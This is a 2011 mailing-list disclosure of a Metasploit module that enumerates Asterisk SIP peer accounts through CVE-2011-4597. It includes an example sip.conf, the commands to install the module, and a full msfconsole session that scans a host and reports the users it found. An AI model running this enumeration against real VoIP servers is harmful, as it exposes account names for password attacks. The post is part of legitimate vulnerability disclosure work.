[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4EF2F1F5.5060300@wushu.net.nz>
Date: Thu, 22 Dec 2011 22:01:41 +1300
From: Ben Williams <ben+bugtraq@...hu.net.nz>
To: Voipsec@...psa.org, bugtraq@...urityfocus.com
Subject: Exploit for Asterisk Security Advisory AST-2011-013
A Metasploit module is attached that demonstrates how to enumerate
Asterisk sip peers that have a nat setting different to the global sip
nat setting as described in Asterisk Security Advisory AST-2011-013.
The example below finds all peers with nat=yes, but the metasploit module
will also work when global nat=yes and peers have nat=no.
Vulnerability discovered and exploit created by Ben Williams.
References:
http://downloads.asterisk.org/pub/security/AST-2011-013.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4597
Example sip.conf:
[general]
context=default
alwaysauthreject = yes
[1000]
nat=yes
type=peer
secret=12345cdsf0sd9r2e9
callerid=John Doe <1000>
host=dynamic
context=trusted
[1001]
nat=yes
secret=12345
type=peer
host=dynamic
[1002]
secret=12345a
type=peer
host=dynamic
# svn co https://www.metasploit.com/svn/framework3/trunk/
# cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/
# cd trunk
# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 362 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 143 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 143 days
ago.
We recommend that you update the framework at least every
other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use auxiliary/scanner/sip/enumerator_asterisk_nat_peers
msf auxiliary(enumerator_asterisk_nat_peers) > info
Name: SIP Username Enumerator for Asterisk (UDP) Security
Advisory AST-2011-013, CVE-2011-4597
Module: auxiliary/scanner/sip/enumerator_asterisk_nat_peers
Version: 1
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Ben Williams
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe
in each set
CHOST no The local client address
CPORT 5070 no The local client port
MAXEXT 9999 yes Ending extension
MINEXT 0 yes Starting extension
PADLEN 4 yes Cero padding maximum length
RHOSTS yes The target address range or
CIDR identifier
RPORT 5060 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
REGISTER scan for numeric peer usernames having a nat setting
different to global sip nat setting. Works even when
alwaysauthreject=yes. For this exploit to work, the source port
cannot be 5060. For more details see Asterisk Project Security
Advisory - AST-2011-013
msf auxiliary(enumerator_asterisk_nat_peers) > set RHOSTS 172.16.0.1
RHOSTS => 172.16.0.1
msf auxiliary(enumerator_asterisk_nat_peers) > set MINEXT 1000
MINEXT => 1000
msf auxiliary(enumerator_asterisk_nat_peers) > set MAXEXT 2000
MAXEXT => 2000
msf auxiliary(enumerator_asterisk_nat_peers) > run
[*] Found user: 1000 <sip:1000@....16.0.1> [Auth]
[*] Found user: 1001 <sip:1001@....16.0.1> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(enumerator_asterisk_nat_peers) >
Download attachment "enumerator_asterisk_nat_peers.rb" of type "application/x-ruby" (5396 bytes)
Powered by blists - more mailing lists